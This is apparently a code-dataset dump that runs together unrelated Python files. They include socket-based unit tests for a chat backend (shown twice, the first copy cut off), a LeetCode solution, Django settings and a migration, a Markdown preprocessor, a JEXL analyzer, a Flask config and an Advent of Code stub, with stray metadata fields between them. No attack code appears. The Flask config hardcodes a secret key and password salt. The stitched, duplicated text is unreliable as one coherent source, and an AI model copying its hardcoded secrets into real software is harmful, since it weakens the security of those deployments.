"""
assert self.sock
self.sock.settimeout(timeout)
class BackendInetTest(BackendTest):
"""
Test the backend with an AF_INET socket
"""
def test_version(self) -> None:
"""
Test the version command
"""
self.send_cmd("version")
reply = self.recv_msg()
self.assertEqual(reply, f"info: version: based v{VERSION}")
def test_help(self) -> None:
"""
Test the help command
"""
self.send_cmd("help")
reply = self.recv_msg()
self.assertEqual(reply, str(Message.HELP_MSG)[:-2])
def test_bye(self) -> None:
"""
Test the bye command
"""
self.send_cmd("bye")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_quit(self) -> None:
"""
Test the bye command
"""
self.send_cmd("quit")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_accounts(self) -> None:
"""
Test account listing as well as adding and deleting of accounts
"""
        # empty account list: expect only the confirmation, no account lines
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# delete first account
self.send_cmd("account 0 delete")
reply = self.recv_msg()
self.assertEqual(reply, "info: account 0 deleted.")
# retrieve account list again, should only contain second account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add another account, should get first account id
self.send_cmd("account add test <EMAIL> test3pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
def test_buddies(self) -> None:
"""
Test retrieving the buddy list and buddies adding with send
"""
# retrieve buddy list with no accounts
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve buddy list with empty buddy list
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add buddy with send and retrieve buddy list
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply,
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add more buddies and retrieve buddy list again
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[1],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[2],
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# retrieve only online buddies
self.send_cmd("account 0 buddies online")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
def test_send(self) -> None:
"""
Test sending messages
"""
# try without an account
buddy = "<EMAIL>"
self.send_cmd(f"account 0 send {buddy} this is a test!")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
user = "<EMAIL>"
self.send_cmd(f"account add test {user} testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
        # try again; the test backend echoes the message back
msg = "this is a test!"
self.send_cmd(f"account 0 send {buddy} {msg}")
reply = self.recv_msg()
self.assertRegex(reply,
f"message: 0 {user} [0-9]+ {buddy} {msg.upper()}")
def test_collect(self) -> None:
"""
Test collecting old messages from history
"""
# try without an account
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
        # try again; history is empty, so only the confirmation is returned
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "info: collected messages for account 0.")
def test_status(self) -> None:
"""
Test getting and setting the status
"""
# try without an account
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: online")
# set status to away
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
class BackendInetPushAccountsTest(BackendTest):
"""
Test the backend with an AF_INET socket and the "push accounts"
configuration setting
"""
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 33000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port} --push-accounts"
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 33000 + self.test_run)
def _reconnect(self) -> None:
"""
Network reconnect helper, tries to reconnect to the server
"""
self.sock.close()
self._set_socket()
self._connect()
def test_accounts(self) -> None:
"""
Test account listing and adding
"""
# test getting empty account list on connect
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add first account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
# add another account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
# reconnect to the server and check new account list
self._reconnect()
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
class BackendUnixTest(BackendInetTest):
"""
Test the backend with an AF_UNIX socket
"""
def _set_backend_cmd(self) -> None:
"""
        Set the backend command
"""
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} "\
f"--af unix"
def _set_socket(self) -> None:
"""
        Set the client socket
"""
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
        Set the server address
"""
self.server_addr = str(Path(self.test_dir) / "based.sock")
if __name__ == '__main__':
unittest.main()
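# Run the suite from the repository root (sketch):
#   python -m unittest tests.test_backend -v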
| """
Backend testing code
"""
import subprocess
import unittest
import tempfile
import shutil
import socket
import time
from pathlib import Path
from typing import Any, Optional
from nuqql_based.main import VERSION
from nuqql_based.message import Message
# default socket timeout
DEFAULT_TIMEOUT = 10
class BackendTest(unittest.TestCase):
"""
Common backend test base class
"""
# test run counter
test_run = 0
def setUp(self) -> None:
# increase test run counter
self.__class__.test_run += 1
# create temporary directory
self.test_dir = tempfile.mkdtemp()
# start backend as subprocess
self.path = Path(__file__).resolve().parents[1]
self.backend_cmd = ""
self._set_backend_cmd()
self.proc: Optional[subprocess.Popen] = None
self.proc = subprocess.Popen(self.backend_cmd, shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
# client connection
self.buf = ""
self.sock: Optional[socket.socket] = None
self._set_socket()
self.set_timeout(DEFAULT_TIMEOUT)
self.server_addr: Any = None
self._set_server_addr()
self._connect()
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 32000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port}"
def _set_socket(self) -> None:
"""
Set the client socket
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 32000 + self.test_run)
def _connect(self) -> None:
"""
Network connection helper, tries to reach server for 5 seconds
"""
assert self.sock
tries = 0
while tries < 50:
try:
time.sleep(1)
self.sock.connect(self.server_addr)
break
except OSError:
tries += 1
def tearDown(self) -> None:
assert self.sock and self.proc
# close socket
self.sock.close()
self.sock = None
# close subprocess
self.proc.terminate()
self.proc.wait()
self.proc = None
# delete temporary directory
shutil.rmtree(self.test_dir)
def send_cmd(self, cmd: str) -> None:
"""
Send a command to the backend
"""
assert self.sock
cmd = f"{cmd}\r\n"
self.sock.sendall(cmd.encode())
def recv_msg(self) -> str:
"""
Receive a message from the backend
"""
assert self.sock
while self.buf.find("\r\n") == -1:
data = self.sock.recv(1024)
if not data:
return ""
self.buf += data.decode()
eom = self.buf.find("\r\n")
msg = self.buf[:eom]
self.buf = self.buf[eom + 2:]
return msg
def set_timeout(self, timeout: Optional[float]) -> None:
"""
Set socket timeout
"""
assert self.sock
self.sock.settimeout(timeout)
class BackendInetTest(BackendTest):
"""
Test the backend with an AF_INET socket
"""
def test_version(self) -> None:
"""
Test the version command
"""
self.send_cmd("version")
reply = self.recv_msg()
self.assertEqual(reply, f"info: version: based v{VERSION}")
def test_help(self) -> None:
"""
Test the help command
"""
self.send_cmd("help")
reply = self.recv_msg()
self.assertEqual(reply, str(Message.HELP_MSG)[:-2])
def test_bye(self) -> None:
"""
Test the bye command
"""
self.send_cmd("bye")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_quit(self) -> None:
"""
Test the bye command
"""
self.send_cmd("quit")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_accounts(self) -> None:
"""
Test account listing as well as adding and deleting of accounts
"""
# empty account list, except nothing/timeout
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# delete first account
self.send_cmd("account 0 delete")
reply = self.recv_msg()
self.assertEqual(reply, "info: account 0 deleted.")
# retrieve account list again, should only contain second account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add another account, should get first account id
self.send_cmd("account add test <EMAIL> test3pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
def test_buddies(self) -> None:
"""
Test retrieving the buddy list and buddies adding with send
"""
# retrieve buddy list with no accounts
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve buddy list with empty buddy list
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add buddy with send and retrieve buddy list
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply,
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add more buddies and retrieve buddy list again
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[1],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[2],
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# retrieve only online buddies
self.send_cmd("account 0 buddies online")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
def test_send(self) -> None:
"""
Test sending messages
"""
# try without an account
buddy = "<EMAIL>"
self.send_cmd(f"account 0 send {buddy} this is a test!")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
user = "<EMAIL>"
self.send_cmd(f"account add test {user} testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply
msg = "this is a test!"
self.send_cmd(f"account 0 send {buddy} {msg}")
reply = self.recv_msg()
self.assertRegex(reply,
f"message: 0 {user} [0-9]+ {buddy} {msg.upper()}")
def test_collect(self) -> None:
"""
Test collecting old messages from history
"""
# try without an account
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply because history is empty
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "info: collected messages for account 0.")
def test_status(self) -> None:
"""
Test getting and setting the status
"""
# try without an account
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: online")
# set status to away
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
class BackendInetPushAccountsTest(BackendTest):
"""
Test the backend with an AF_INET socket and the "push accounts"
configuration setting
"""
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 33000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port} --push-accounts"
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 33000 + self.test_run)
def _reconnect(self) -> None:
"""
Network reconnect helper, tries to reconnect to the server
"""
self.sock.close()
self._set_socket()
self._connect()
def test_accounts(self) -> None:
"""
Test account listing and adding
"""
# test getting empty account list on connect
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add first account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
# add another account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
# reconnect to the server and check new account list
self._reconnect()
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
class BackendUnixTest(BackendInetTest):
"""
Test the backend with an AF_UNIX socket
"""
def _set_backend_cmd(self) -> None:
"""
Get the backend command
"""
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} "\
f"--af unix"
def _set_socket(self) -> None:
"""
Get the client socket
"""
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Get the server address
"""
self.server_addr = str(Path(self.test_dir) / "based.sock")
if __name__ == '__main__':
unittest.main() | en | 0.734969 | Backend testing code # default socket timeout Common backend test base class # test run counter # increase test run counter # create temporary directory # start backend as subprocess # client connection Set the backend command Set the client socket Set the server address Network connection helper, tries to reach server for 5 seconds # close socket # close subprocess # delete temporary directory Send a command to the backend Receive a message from the backend Set socket timeout Test the backend with an AF_INET socket Test the version command Test the help command Test the bye command Test the bye command Test account listing as well as adding and deleting of accounts # empty account list, except nothing/timeout # add new account # retrieve account list again, should contain new account # add new account # retrieve account list again, should contain new account # delete first account # retrieve account list again, should only contain second account # add another account, should get first account id # retrieve account list again, should contain new account Test retrieving the buddy list and buddies adding with send # retrieve buddy list with no accounts # add an account # retrieve buddy list with empty buddy list # add buddy with send and retrieve buddy list # test backend returns msg # add more buddies and retrieve buddy list again # test backend returns msg # test backend returns msg # retrieve only online buddies Test sending messages # try without an account # add an account # try again, there should be no reply Test collecting old messages from history # try without an account # add an account # try again, there should be no reply because history is empty Test getting and setting the status # try without an account # add an account # get status again # set status to away # get status again Test the backend with an AF_INET socket and the "push accounts" configuration setting Set the backend command Set the server address Network reconnect helper, tries to reconnect to the server Test account listing and adding # test getting empty account list on connect # add first account # add another account # reconnect to the server and check new account list Test the backend with an AF_UNIX socket Get the backend command Get the client socket Get the server address | 2.376275 | 2 |
medium/Sum Root to Leaf Numbers/solution.py | ashutosh1919/leetcode-problems | 8 | 6616781 |
# Time complexity: O(n)
# Approach: Modified preorder traversal, checking for leaf nodes and accumulating the sum in instance state.
from typing import Optional

# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def __init__(self):
self.sum = 0
def findSum(self, root, ts):
if not root:
return
if not root.left and not root.right:
self.sum += int(ts+str(root.val))
return
self.findSum(root.left, ts+str(root.val))
self.findSum(root.right, ts+str(root.val))
def sumNumbers(self, root: Optional[TreeNode]) -> int:
self.findSum(root, "")
        return self.sum
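# A minimal usage sketch (assumes the TreeNode class commented out above is
# available, as it is on LeetCode; the tree below encodes the root-to-leaf
# numbers 12 and 13, so the expected sum is 25):
# root = TreeNode(1, TreeNode(2), TreeNode(3))
# print(Solution().sumNumbers(root))  # 25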
src/login/bklogin/config/common/django_basic.py | Canway-shiisa/bk-user | 0 | 6616782 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS
Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import os
from . import PROJECT_ROOT, env
ALLOWED_HOSTS = ["*"]
# Generic Django project settings
DEBUG = env.bool("DEBUG", False)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "<KEY>"
CSRF_COOKIE_NAME = "bklogin_csrftoken"
# View invoked when CSRF validation fails
CSRF_FAILURE_VIEW = "bklogin.bkauth.views.csrf_failure"
ROOT_URLCONF = "bklogin.urls"
SITE_URL = "/"
# Django 3 required
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
# Application definition
INSTALLED_APPS = (
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django_prometheus",
"bklogin.bkaccount",
"bklogin.bkauth",
"bklogin.bk_i18n",
"bklogin.monitoring",
)
MIDDLEWARE = (
"django_prometheus.middleware.PrometheusBeforeMiddleware",
"bkuser_global.middlewares.RequestProvider",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
"bklogin.bkauth.middlewares.LoginMiddleware",
"bklogin.bk_i18n.middlewares.LanguageMiddleware",
"bklogin.bk_i18n.middlewares.ApiLanguageMiddleware",
"bklogin.bk_i18n.middlewares.TimezoneMiddleware",
"django_prometheus.middleware.PrometheusAfterMiddleware",
)
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
# django template dir
"DIRS": (
            # Absolute paths, e.g. "/home/html/django_templates" or "C:/www/django/templates".
os.path.join(PROJECT_ROOT, "bklogin/templates"),
),
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.csrf",
"bklogin.common.context_processors.site_settings",
"django.template.context_processors.i18n",
"django.contrib.messages.context_processors.messages",
],
},
},
]
# ===============================================================================
# Static assets settings
# ===============================================================================
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "static/"),)
STATIC_VERSION = "0.2.3"
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, "staticfiles/")
# CSS file suffix
CSS_SUFFIX = "min.css"
# JS file suffix
JS_SUFFIX = "min.js"
# ==============================================================================
# Django project configuration
# ==============================================================================
USE_I18N = True
USE_L10N = True
# timezone
# Default time zone for localization in the UI.
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
TIME_ZONE = "Asia/Shanghai"
USE_TZ = True
TIMEZONE_SESSION_KEY = "django_timezone"
# language
LANGUAGES = (
("en", "English"),
("zh-hans", "简体中文"),
)
LANGUAGE_CODE = "zh-hans"
LANGUAGE_COOKIE_NAME = "blueking_language"
LANGUAGE_COOKIE_PATH = "/"
LOCALE_PATHS = (os.path.join(PROJECT_ROOT, "locale"),)
# ==============================================================================
# AUTHENTICATION
# ==============================================================================
AUTH_USER_MODEL = "bkauth.User"
variableServer/migrations/0001_initial.py | bhecquet/seleniumRobot-server | 0 | 6616783 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-09-20 14:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('commonsServer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Variable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('value', models.CharField(max_length=300)),
('releaseDate', models.DateTimeField(null=True)),
('internal', models.BooleanField(default=False)),
('protected', models.BooleanField(default=False)),
('description', models.CharField(default='', max_length=500, null=True)),
],
options={
'permissions': (('see_protected_var', 'Can see protected vars'),),
},
),
migrations.CreateModel(
name='Application',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.application',),
),
migrations.CreateModel(
name='TestCase',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testcase',),
),
migrations.CreateModel(
name='TestEnvironment',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testenvironment',),
),
migrations.CreateModel(
name='Version',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.version',),
),
migrations.AddField(
model_name='variable',
name='application',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Application'),
),
migrations.AddField(
model_name='variable',
name='environment',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestEnvironment'),
),
migrations.AddField(
model_name='variable',
name='test',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestCase'),
),
migrations.AddField(
model_name='variable',
name='version',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Version'),
),
    ]
GithubMarkdown.py | issuequality/issuequality | 0 | 6616784 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
from hashlib import md5
class GithubMarkdown(object):
"""Classe para representar um texto formato com
a sintaxe do Markdown adotada pelo github.
"""
def __init__(self, text):
"""TODO: to be defined1. """
self.__content = self.parse(text)
def get_content(self):
"""TODO: Docstring for get_content.
:returns: TODO
"""
if self.__content is None:
return None
else:
return self.__content
def parse(self, text):
# Extract pre blocks.
extractions = {}
def pre_extraction_callback(matchobj):
digest = md5(matchobj.group(0)).hexdigest()
extractions[digest] = matchobj.group(0)
return "{gfm-extraction-%s}" % digest
pattern = re.compile(r'<pre>.*?</pre>', re.MULTILINE | re.DOTALL)
text = re.sub(pattern, pre_extraction_callback, text)
# Prevent foo_bar_baz from ending up with an italic word in the middle.
def italic_callback(matchobj):
s = matchobj.group(0)
if list(s).count('_') >= 2:
return s.replace('_', '\_')
return s
text = re.sub(r'^(?! {4}|\t)\w+_\w+_\w[\w_]*', italic_callback, text)
# In very clear cases, let newlines become <br /> tags.
def newline_callback(matchobj):
if len(matchobj.group(1)) == 1:
return matchobj.group(0).rstrip() + ' \n'
else:
return matchobj.group(0)
pattern = re.compile(r'^[\w\<][^\n]*(\n+)', re.MULTILINE)
text = re.sub(pattern, newline_callback, text)
# Insert pre block extractions.
def pre_insert_callback(matchobj):
return '\n\n' + extractions[matchobj.group(1)]
text = re.sub(r'{gfm-extraction-([0-9a-f]{32})\}',
pre_insert_callback,
text
)
        return text
caluma/core/jexl.py | sliverc/caluma | 0 | 6616785 |
from pyjexl.analysis import ValidatingAnalyzer
class ExtractTransformSubjectAnalyzer(ValidatingAnalyzer):
"""
Extract all subject values of given transforms.
If no transforms are given all subjects of all transforms will be extracted.
"""
def __init__(self, config, transforms=[]):
self.transforms = transforms
super().__init__(config)
def visit_Transform(self, transform):
if not self.transforms or transform.name in self.transforms:
yield transform.subject.value
        yield from self.generic_visit(transform)
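# A hedged usage sketch (the JEXL entry point, expression and transform name
# below are assumptions for illustration, not taken from this file):
# from functools import partial
# from pyjexl.jexl import JEXL
# jexl = JEXL()
# subjects = list(jexl.analyze(
#     '"question-1"|answer',
#     partial(ExtractTransformSubjectAnalyzer, transforms=["answer"]),
# ))  # expected: ["question-1"]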
backend/config.py | Philogag/Flask-Cloud-Disk | 1 | 6616786 |
from datetime import timedelta
import os
#
SECRET_KEY = 'asgwesvrery]p'
HASH_SALT = "qwwgawegxdf+w36_"  # 16-character salt used for password hashing
AES_KEY_LENGTH = 64
MAX_CHUNK_SIZE = 4 * 1024 * 1024 # B = 4MB
# Blacklisted characters in file/folder names
BANNED_CHARSET = """/\:*?"<>|"""
# Recycle-bin retention time
# RECYCLE_BIN_TTL = 7 * 24 * 3600 # seconds
RECYCLE_BIN_TTL = 120
# Login settings
PERMANENT_SESSION_LIFETIME = timedelta(days=1)  # login session lifetime
REMEMBER_COOKIE_REFRESH_EACH_REQUEST = True  # refresh the cookie lifetime on every request
# Database configuration
MONGODB_SETTINGS = {
"db": 'cloud_disk',
'host': '192.168.10.5',
'port': 27017,
'connect': False,
'username': 'root',
'password': '<PASSWORD>',
"authentication_source":'admin',
}
# HDFS settings
HADOOP_MASTER = [
"192.168.10.5:50070",
]
HADOOP_USER_NAME='root'
HDFS_HOME = '/cloud'  # root directory inside HDFS
# HBase settings
# HBASE_MASTER = "192.168.10.5:60000"
20/task_1.py | Nenivar/advent-of-code-2018 | 0 | 6616787 | import re, sys
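# Advent of Code 2018, day 20 ("A Regular Map"): exploratory parsing of the
# regex-like route description using re plus manual bracket matching.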
#sample = '^ENWWW(NEEE|SSE(EE|N))SSWE(S|)$'
sample = '^ENNWSWW(NEWS|)SSSEEN(WNSE|)EE(SWEN|)NNN$'
#sample = '^ESSWWN(E|NNENN(EESS(WNSE|)SSS|WWWSSSSE(SW|NNNE)))$'
regex = re.compile(r'(\w+)')
bracketed = re.compile(r'\((\w*\|?)*\)')
final = re.compile(r'^((\)|\|)*\$)')
#bracketed = re.compile(r'\(([^()]|(\R?))*\)')
#match = re.search(regex, sample)
